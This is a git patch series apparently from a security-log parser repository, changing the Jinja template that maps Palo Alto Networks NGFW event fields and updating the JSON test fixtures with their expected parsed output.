       "Threat_ContentType": "url",
-      "VirtualLocation": "vsys",
-      "VirtualSystemName": "VSYS",
       "threat": {
-        "id": "9999",
-        "type": "URL filtering log"
+        "id": "9999"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index afc856776..207cd20b3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
@@ -72,24 +72,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "X-Phone",
-      "PanOSDestinationDeviceHost": "pan-622",
-      "PanOSDestinationDeviceMac": "620797415366",
-      "PanOSDestinationDeviceModel": "MI",
-      "PanOSDestinationDeviceOSFamily": "A1",
-      "PanOSDestinationDeviceOSVersion": "Android v9.1",
-      "PanOSDestinationDeviceProfile": "x-profile",
-      "PanOSDestinationDeviceVendor": "Xiaomi",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceDeviceHost": "pan-505",
-      "PanOSSourceDeviceModel": "Note 4G",
-      "PanOSSourceDeviceProfile": "x-profile",
-      "PanOSSourceDeviceVendor": "Lenovo",
-      "PanOSSourceLocation": "LY",
-      "PanOSThreatCategory": "unknown",
-      "PanOSThreatID": "27379(27379)",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 20a78b306..cff329e0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -51,16 +51,10 @@
       "serial_number": "001701000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
-        "name": "PDF Exploit Evasion Found",
-        "type": "vulnerability exploit detection"
+        "name": "PDF Exploit Evasion Found"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index 4fd068d08..b74fdb564 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
@@ -72,12 +72,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
-      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "LF-5698-NR"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
index a892a2a7b..1469faf57 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
@@ -72,12 +72,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
-      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
-      "URLCategory": "low-risk",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "GP cloud service"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
index 58c77fa30..9bf8bd0de 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
@@ -78,29 +78,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSContainerName": "pan-dp-77754f4",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "N-Phone",
-      "PanOSDestinationDeviceHost": "pan-355",
-      "PanOSDestinationDeviceMac": "530589561221",
-      "PanOSDestinationDeviceModel": "Nexus",
-      "PanOSDestinationDeviceOSFamily": "H1511",
-      "PanOSDestinationDeviceOSVersion": "Android v7",
-      "PanOSDestinationDeviceProfile": "n-profile",
-      "PanOSDestinationDeviceVendor": "Google",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSGPHostID": "xxxxxxxxxxxxxx",
-      "PanOSHASessionOwner": "session_owner-4",
-      "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
-      "PanOSSourceDeviceHost": "pan-301",
-      "PanOSSourceDeviceModel": "Nexus",
-      "PanOSSourceDeviceProfile": "n-profile",
-      "PanOSSourceDeviceVendor": "Google",
-      "PanOSSourceDynamicAddressGroup": "aqua_dag",
-      "PanOSSourceLocation": "east-coast",
-      "PanOSX-Forwarded-ForIP": "1.1.1.1",
-      "URLCategory": "custom-category",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
index 3445ddc4f..1621cfeed 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
@@ -49,8 +49,7 @@
       "serial_number": "026701002040"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
index 3238eb5e4..324587ad2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "deny",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "deny"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json
index 41d495725..f3a6b58d6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
@@ -77,25 +77,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
-      "PanOSContainerName": "pan-dp-77754f4",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "L-Phone",
-      "PanOSDestinationDeviceHost": "pan-506",
-      "PanOSDestinationDeviceMac": "150083646537",
-      "PanOSDestinationDeviceModel": "Note XT",
-      "PanOSDestinationDeviceOSFamily": "K8",
-      "PanOSDestinationDeviceOSVersion": "Android v8",
-      "PanOSDestinationDeviceProfile": "l-profile",
-      "PanOSDestinationDeviceVendor": "Lenovo",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceDeviceHost": "pan-505",
-      "PanOSSourceDeviceModel": "Note 4G",
-      "PanOSSourceDeviceProfile": "l-profile",
-      "PanOSSourceDeviceVendor": "Lenovo",
-      "PanOSSourceDynamicAddressGroup": "blue_dag",
-      "PanOSSourceLocation": "west-coast",
-      "URLCategory": "sports",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json
index c90ab6ed6..ea8e442b5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
@@ -53,10 +53,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
-    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index edd76521b..8c7d37227 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
@@ -60,13 +60,8 @@
       "serial_number": "111111111111"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "738",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
       "Threat_ContentType": "wildfire",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxx"
       },

From 9014eb71b8b40f8fcdab10798cefa107441f637f Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 16:39:58 +0200
Subject: [PATCH 190/317] Fix PaloAlto NGFW parser and tests

---
 .../paloalto-ngfw/ingest/parser.yml           | 16 ++++++-------
 .../paloalto-ngfw/tests/User_id_1_csv.json    |  9 +++++++-
 .../paloalto-ngfw/tests/User_id_2_csv.json    |  9 +++++++-
 .../paloalto-ngfw/tests/auth_cef.json         |  7 ++++++
 .../paloalto-ngfw/tests/decryption_cef.json   |  3 +++
 .../paloalto-ngfw/tests/file_cef.json         |  4 ++++
 .../paloalto-ngfw/tests/fix_bug_with_int.json |  3 ++-
 .../tests/fix_bug_without_int.json            |  3 ++-
 .../tests/globalprotect_cef.json              |  1 +
 .../tests/globalprotect_csv.json              |  2 ++
 .../tests/globalprotect_csv_2.json            |  2 ++
 .../paloalto-ngfw/tests/hip_match_cef.json    |  3 +++
 .../paloalto-ngfw/tests/icmp_allow_csv.json   |  3 ++-
 .../paloalto-ngfw/tests/iptag_cef.json        |  4 ++++
 .../tests/network_threat_alert_1.json         |  8 ++++++-
 .../tests/network_threat_alert_2.json         |  9 +++++++-
 .../paloalto-ngfw/tests/sctp_cef.json         |  4 ++++
 .../paloalto-ngfw/tests/system_csv.json       |  5 ++++
 .../paloalto-ngfw/tests/tcp_allow_csv.json    |  3 ++-
 .../tests/test_cloud_election_json.json       |  4 ++++
 .../tests/test_dhcp_renew_json.json           |  4 ++++
 .../tests/test_dns_proxy_json.json            |  4 ++++
 .../tests/test_file_alert_json.json           |  8 ++++++-
 .../tests/test_globalprotect.json             |  2 ++
 .../tests/test_installed_package_json.json    |  4 ++++
 .../tests/test_ldap_brute_force.json          |  5 ++++
 .../tests/test_new_file_type.json             |  8 ++++++-
 .../tests/test_new_globalprotect.json         |  5 ++++
 .../tests/test_new_threat_type.json           |  5 ++++
 .../tests/test_new_url_type.json              |  8 ++++++-
 .../tests/test_ntp_sync_json.json             |  4 ++++
 .../tests/test_port_up_json.json              |  4 ++++
 .../tests/test_registration_succeed_json.json |  4 ++++
 .../paloalto-ngfw/tests/test_system.json      |  5 ++++
 .../tests/test_system_event_10_json.json      |  4 ++++
 .../tests/test_system_event_11_json.json      |  4 ++++
 .../tests/test_system_event_12_json.json      |  4 ++++
 .../tests/test_system_event_1_json.json       |  4 ++++
 .../tests/test_system_event_2_json.json       |  4 ++++
 .../tests/test_system_event_3_json.json       |  4 ++++
 .../tests/test_system_event_4_json.json       |  4 ++++
 .../tests/test_system_event_5_json.json       |  4 ++++
 .../tests/test_system_event_6_json.json       |  4 ++++
 .../tests/test_system_event_7_json.json       |  4 ++++
 .../tests/test_system_event_8_json.json       |  4 ++++
 .../tests/test_system_event_9_json.json       |  4 ++++
 .../paloalto-ngfw/tests/test_threat.json      |  5 ++++
 .../paloalto-ngfw/tests/test_threat_02.json   |  5 ++++
 .../tests/test_timestamp_palo.json            |  5 ++++
 .../tests/test_traffic_event_1_json.json      |  8 ++++++-
 .../tests/test_traffic_event_2_json.json      |  8 ++++++-
 .../tests/test_update_content_json.json       |  4 ++++
 .../tests/test_upgrade_package_json.json      |  4 ++++
 .../tests/test_user_authentication_json.json  |  4 ++++
 .../paloalto-ngfw/tests/test_userid.json      |  9 +++++++-
 .../tests/test_web_authentication_json.json   |  4 ++++
 .../tests/test_wildfire_failure_json.json     |  4 ++++
 .../paloalto-ngfw/tests/threat-url-xff.json   |  6 +++++
 .../paloalto-ngfw/tests/threat_cef.json       | 18 +++++++++++++++
 .../paloalto-ngfw/tests/threat_csv.json       |  5 ++++
 .../paloalto-ngfw/tests/traffic1_csv.json     |  6 +++++
 .../paloalto-ngfw/tests/traffic2_csv.json     |  6 +++++
 .../paloalto-ngfw/tests/traffic_cef.json      | 23 +++++++++++++++++++
 .../tests/traffic_with_resotimestamp.json     |  3 ++-
 .../paloalto-ngfw/tests/udp_deny_csv.json     |  3 ++-
 .../paloalto-ngfw/tests/url_cef.json          | 19 +++++++++++++++
 .../paloalto-ngfw/tests/userid_cef.json       |  4 ++++
 .../paloalto-ngfw/tests/wildfire1_json.json   |  5 ++++
 68 files changed, 353 insertions(+), 25 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 84ad45ff1..d82b5d2f1 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -715,16 +715,14 @@ stages:
           user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}"
           user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}"
           paloalto: >-
-            { 
-            {% set ns = namespace(first_iteration=True) %}
-            {% for key, value in parsed_event.message.items() %}
-            {% if value not in ["null", "", None] %}
-            {% if not ns.first_iteration %},{% endif %}
-            {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}}
-            {% set ns.first_iteration = false %}
-            {% endif %}
-            {% endfor %}
+            {
+              {%- for key, value in parsed_event.message.items() -%}
+                {%- if value not in ["null", "", None] -%}                  
+                  {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}},
+                {%- endif -%}
+              {%- endfor -%}
             }
+
           paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}"
           paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}"
           paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json
index dba765bd4..08c69d61f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
@@ -30,7 +30,14 @@
       "serial_number": "016401002222"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
index 63c79e671..539963216 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
@@ -30,7 +30,14 @@
       "serial_number": "01640103000"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
index 1b4a52135..ff12d8db6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
@@ -57,6 +57,13 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSourceDeviceHost": "src_host_list-0",
+      "PanOSSourceDeviceModel": "src_model_list-1",
+      "PanOSSourceDeviceProfile": "src_profile_list-1",
+      "PanOSSourceDeviceVendor": "src_vendor_list-1",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "xxxxx"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
index e213912c2..1a4fba4b4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
@@ -61,6 +61,9 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "ip": [
         "1.1.1.1"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
index 965583ed3..2da36f33e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
@@ -65,6 +65,10 @@
     },
     "paloalto": {
       "DirectionOfAttack": "client to server",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
+      "URLCategory": "any",
+      "VirtualLocation": "smtp",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
index 4dadbb51b..512ae89e7 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
@@ -52,7 +52,8 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
index 4863396f8..add589697 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
@@ -52,7 +52,8 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
index 09505692f..4fd7b8802 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
@@ -42,6 +42,7 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSQuarantineReason": "Malicious Traffic",
       "authentication": {
         "method": "RADIUS"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 0c72fdb63..65f2b6940 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
@@ -34,7 +34,9 @@
       "serial_number": "ABCDEFG"
     },
     "paloalto": {
+      "EventID": "gw-auth",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "login"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index 2f8cb93ae..e4b1d5fab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
@@ -34,7 +34,9 @@
       "serial_number": "DFN3535D"
     },
     "paloalto": {
+      "EventID": "gateway-config-release",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "configuration"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 966ea0b88..6a0a99b82 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
@@ -40,6 +40,9 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index 6e8e88e79..e4e153224 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "start"
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 4eef50d9d..9d2db872a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
@@ -39,6 +39,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
     "related": {
       "hosts": [
         "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index a6c93b2c4..d14918dab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
@@ -58,8 +58,14 @@
       "serial_number": "000011111112222"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "982",
+      "DGHierarchyLevel2": "117",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index 6fd2dbfa0..e8c257c69 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
@@ -63,8 +63,15 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
+      "ContentType": "text/plain",
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "525",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index ff9edc877..717e963a0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
@@ -57,6 +57,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSourceLocation": "US",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index ab8aae097..3e52f494c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
@@ -30,6 +30,11 @@
       "serial_number": "11111114444"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index 49c1758ab..eb10d6148 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801016000"
     },
     "paloalto": {
-      "Threat_ContentType": "start"
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys1234"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index c4c2b4c70..3af5d5428 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 17ae8dd31..5e1cc96a9 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index 72af37535..f4541dcbf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dnsproxy"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index ee2f64323..3142ed671 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
@@ -60,8 +60,14 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "467",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file"
+      "Threat_ContentType": "file",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index aa4388311..f08a677ef 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
@@ -37,7 +37,9 @@
       "serial_number": "PF000000"
     },
     "paloalto": {
+      "EventID": "gateway-switch-to-ssl",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "tunnel"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
